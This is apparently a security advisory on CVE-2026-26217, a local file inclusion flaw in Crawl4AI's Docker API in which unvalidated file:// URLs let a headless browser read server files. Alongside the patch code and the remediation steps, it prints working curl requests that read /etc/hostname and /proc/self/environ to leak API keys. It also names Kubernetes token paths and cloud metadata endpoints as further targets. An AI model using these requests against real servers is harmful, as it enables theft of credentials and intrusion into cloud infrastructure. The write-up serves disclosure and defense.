Feb 17, 2026
Crawl4AI exposed a headless browser via API without validating URL schemes. Attackers can use `file:///etc/passwd` or `file:///proc/self/environ` to read server files and steal API keys. Fixed in version 0.8.0.
A critical Local File Inclusion (LFI) vulnerability in Crawl4AI's Docker API allows unauthenticated attackers to abuse the `file://` protocol. By leveraging the headless browser intended for web scraping, attackers can read arbitrary files from the host filesystem, including sensitive environment variables and credentials.
In the gold rush of 2025, everyone needed data to feed their hungry Large Language Models. Enter Crawl4AI, a nifty tool designed to turn the chaotic web into clean, LLM-ready JSON. It’s a developer favorite because it abstracts away the nightmare of managing headless browsers like Chromium. You spin up a Docker container, send it a URL, and it politely hands back the content. Simple, right?
But here is the problem with abstraction: it hides the monsters. When you deploy Crawl4AI's Docker API, you are essentially exposing a full-featured web browser to the internet. Browsers are designed to be helpful. They want to render images, execute JavaScript, and—if you ask nicely—open local files.
CVE-2026-26217 is what happens when you hand a loaded browser to the public internet without checking the safety. It turns out, if you asked Crawl4AI to "crawl" your own hard drive using the file:// protocol, it wouldn't just comply; it would take a screenshot, convert it to PDF, or extract the text and serve it up on a silver platter. It’s not just a bug; it’s an architectural oversight that turns a scraping tool into a file exfiltration cannon.
The vulnerability lies in a classic failure of input validation, specifically regarding Uniform Resource Identifier (URI) schemes. The Crawl4AI API endpoints (`/execute_js`, `/screenshot`, `/pdf`, and `/html`) accept a JSON payload containing a `url` parameter. The application logic takes this string and passes it directly to the underlying browser automation library (likely Playwright or Puppeteer).
Under normal circumstances, a browser should be able to open local files. If you double-click an HTML file on your desktop, Chrome opens it. That's a feature. However, in a server-side context, this feature becomes a critical vulnerability known as Local File Inclusion (LFI) or Server-Side Request Forgery (SSRF) with local access.
> [!NOTE]
> The Protocol Problem
> The root cause isn't that the code was complex; it's that it was too simple. It lacked an allowlist. It implicitly trusted that the user would only provide http:// or https:// URLs.
By supplying a URI like `file:///etc/passwd`, the attacker instructs the headless browser to navigate to the local file system. Because the browser process (running inside the container) has read permissions for standard system files, it renders the file content just as it would render a webpage. The API then packages this content into the response, completing the exfiltration loop.
Let's look at a reconstruction of the vulnerable logic versus the patched approach. The vulnerability exists because the URL is passed raw to the browser navigation method.
In the vulnerable versions (< 0.8.0), the handler for the `/html` endpoint looked something like this:

```python
@app.post("/html")
async def get_html(request: CrawlRequest):
    # ❌ FATAL ERROR: No validation of request.url
    # The browser blindly follows the file:// protocol
    await page.goto(request.url)
    content = await page.content()
    return {"html": content}
```

The patch introduces a strict protocol check. Before the URL touches the browser, it must pass a scheme validation check.
```python
from urllib.parse import urlparse

from fastapi import HTTPException  # assumed: the @app.post / HTTPException usage matches FastAPI


@app.post("/html")
async def get_html(request: CrawlRequest):
    parsed = urlparse(request.url)
    # ✅ SECURITY FIX: Enforce HTTP/HTTPS
    if parsed.scheme not in ["http", "https"]:
        raise HTTPException(status_code=400, detail="Invalid protocol")
    await page.goto(request.url)
    content = await page.content()
    return {"html": content}
```

This simple check neutralizes the attack. If an attacker tries to pass `file:///etc/shadow`, the `urlparse` logic sees the scheme as `file`, the check fails, and the request is rejected before the browser is even invoked.
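Because four endpoints accept a `url`, the same check is easier to audit when it lives in one place. The following is a minimal sketch of such a helper, not the code from the actual patch: the names `ALLOWED_SCHEMES` and `is_allowed_url` are hypothetical, and requiring a non-empty host is an extra assumption beyond the scheme check shown above.

```python
from urllib.parse import urlparse

# Assumption: only plain web URLs are legitimate crawl targets.
ALLOWED_SCHEMES = frozenset({"http", "https"})


def is_allowed_url(url: str) -> bool:
    """Return True only for absolute http(s) URLs that name a host."""
    try:
        parsed = urlparse(url.strip())
        host = parsed.hostname
    except ValueError:
        # urlparse rejects some malformed inputs, e.g. an unclosed IPv6 literal.
        return False
    # urlparse lowercases the scheme, so "FILE://" is treated like "file://".
    return parsed.scheme in ALLOWED_SCHEMES and bool(host)


# Example inputs: one legitimate target and several that should be refused.
for candidate in (
    "https://example.com/page",
    "file:///etc/passwd",
    "FILE:///proc/self/environ",
    "http:///etc/passwd",
    "/etc/passwd",
):
    print(candidate, "->", is_allowed_url(candidate))
```

An allowlist is used rather than a blocklist of `file://` so that any other scheme the browser understands is refused by default.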
Exploiting this vulnerability is trivial and requires no authentication in the default Docker configuration. We can use standard curl commands to extract data. The most dangerous vector here isn't necessarily /etc/passwd—it's the environment variables.
Since this tool is built for AI workflows, it is highly likely that the container environment contains API keys for OpenAI, Anthropic, or AWS credentials.
We check if the server is vulnerable by trying to read the /etc/hostname file, which is present in almost every Docker container.
```bash
curl -X POST http://target:8080/html \
  -H "Content-Type: application/json" \
  -d '{"url": "file:///etc/hostname"}'
```

If the server responds with the hostname, we escalate immediately to `/proc/self/environ`. This file contains the environment variables for the current process, separated by null bytes.
```bash
curl -X POST http://target:8080/execute_js \
  -H "Content-Type: application/json" \
  -d '{
    "url": "file:///proc/self/environ",
    "scripts": ["document.body.innerText"]
  }'
```

The Output:
Instead of a webpage, the attacker receives a JSON response containing strings like:

```
OPENAI_API_KEY=sk-proj-12345...\u0000AWS_ACCESS_KEY_ID=AKIA...
```
With these keys, the attacker can pivot from the simple scraper container to the victim's cloud infrastructure or drain their AI credits.
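To gauge how much a single response of this kind discloses, the null-separated format can be split into name/value pairs. This is a small sketch for auditing your own container; the function name `parse_environ` and the sample values are made up for illustration and are not real output.

```python
def parse_environ(raw: bytes) -> dict[str, str]:
    """Split a /proc/<pid>/environ blob into a name -> value mapping."""
    env: dict[str, str] = {}
    for entry in raw.split(b"\x00"):
        if not entry:
            continue  # skip the empty piece left by a trailing NUL
        name, sep, value = entry.partition(b"=")
        if sep:  # ignore anything that is not NAME=value
            env[name.decode(errors="replace")] = value.decode(errors="replace")
    return env


# Hypothetical sample in the same shape as the response above.
sample = b"OPENAI_API_KEY=sk-example\x00AWS_ACCESS_KEY_ID=AKIAEXAMPLE\x00"
exposed = parse_environ(sample)
print(sorted(exposed))
```

Running the same function against `/proc/self/environ` inside your own deployment lists every variable an attacker would have seen, which is the set of credentials to rotate.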
While CVSS 9.2 sounds high (and it is), the real impact depends on context. If Crawl4AI is running on a developer's laptop, the attacker reads their local files. If it's running in a Kubernetes cluster, the attacker reads the Service Account token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.
The same unvalidated `url` parameter can also be pointed at internal targets such as `http://localhost:80` or `http://169.254.169.254` (cloud metadata services) to steal IAM role credentials.

This is a "game over" vulnerability for the confidentiality of the container and potentially the hosting infrastructure.
The remediation is straightforward, but urgency is required. The exploit is public, simple, and scriptable.
1. Update Immediately: Pull the latest Docker image. Version 0.8.0 and above contain the fix.

   ```bash
   docker pull unclecode/crawl4ai:latest
   ```

2. Network Segmentation: Even with the patch, a scraping tool should never have unfettered access to internal networks. Ensure the container has no egress access to internal subnets (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) and block access to cloud metadata IPs (169.254.169.254).
3. Run with Least Privilege: Do not run the container as root. While this doesn't stop the LFI of world-readable files, it prevents access to `/etc/shadow` or other root-owned sensitive data.
4. Authentication: The default Crawl4AI Docker setup does not enforce authentication. Put it behind a reverse proxy (Nginx, Traefik) that enforces Basic Auth or API key validation. Do not expose port 8080 to the public internet.
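The network restrictions in step 2 can be mirrored at the application layer as defense in depth. The sketch below uses Python's standard `ipaddress` module to flag URLs whose host resolves to a loopback, private, or link-local address. The function names are hypothetical and this is not part of Crawl4AI. It also assumes the address seen at check time is the one the browser will use, which does not hold under DNS rebinding or HTTP redirects, so it complements firewall rules rather than replacing them.

```python
import ipaddress
import socket
from urllib.parse import urlparse


def is_internal_address(ip_text: str) -> bool:
    """True for loopback, private (RFC 1918), link-local and similar ranges."""
    ip = ipaddress.ip_address(ip_text)
    return (
        ip.is_private
        or ip.is_loopback
        or ip.is_link_local  # covers 169.254.169.254 (cloud metadata)
        or ip.is_reserved
        or ip.is_unspecified
    )


def targets_internal_host(url: str) -> bool:
    """True if any address the URL's host resolves to is internal."""
    host = urlparse(url).hostname
    if host is None:
        return True  # nothing to vet: treat as unsafe
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return True  # unresolvable: refuse rather than guess
    # Each result's sockaddr tuple starts with the IP address string.
    return any(is_internal_address(info[4][0]) for info in infos)


for url in ("http://169.254.169.254/", "http://10.0.0.5/", "http://8.8.8.8/"):
    print(url, "->", targets_internal_host(url))
```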
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

| Product | Affected Versions | Fixed Version |
|---|---|---|
| Crawl4AI (unclecode) | < 0.8.0 | 0.8.0 |

| Attribute | Detail |
|---|---|
| CWE ID | CWE-22 (Path Traversal) |
| CVSS v4.0 | 9.2 (Critical) |
| CVSS Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N |
| Attack Vector | Network (API) |
| Exploit Status | PoC Available / Active |
| Impact | Information Disclosure (High) |
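For readers who want to check the vector in the table against the prose, a vector string is a version prefix followed by slash-separated `metric:value` pairs. The helper below is an illustrative sketch (the name `parse_cvss_vector` is hypothetical); it only splits the string and does not compute a score.

```python
def parse_cvss_vector(vector: str) -> tuple[str, dict[str, str]]:
    """Split a CVSS vector string into (version, {metric: value})."""
    prefix, *pairs = vector.split("/")
    version = prefix.split(":", 1)[1]
    metrics = dict(pair.split(":", 1) for pair in pairs)
    return version, metrics


version, metrics = parse_cvss_vector(
    "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"
)
# AV:N = network attack vector, PR:N = no privileges required,
# VC:H / SC:H = high confidentiality impact on the vulnerable and subsequent systems.
print(version, metrics["AV"], metrics["PR"], metrics["VC"], metrics["SC"])
```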
The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.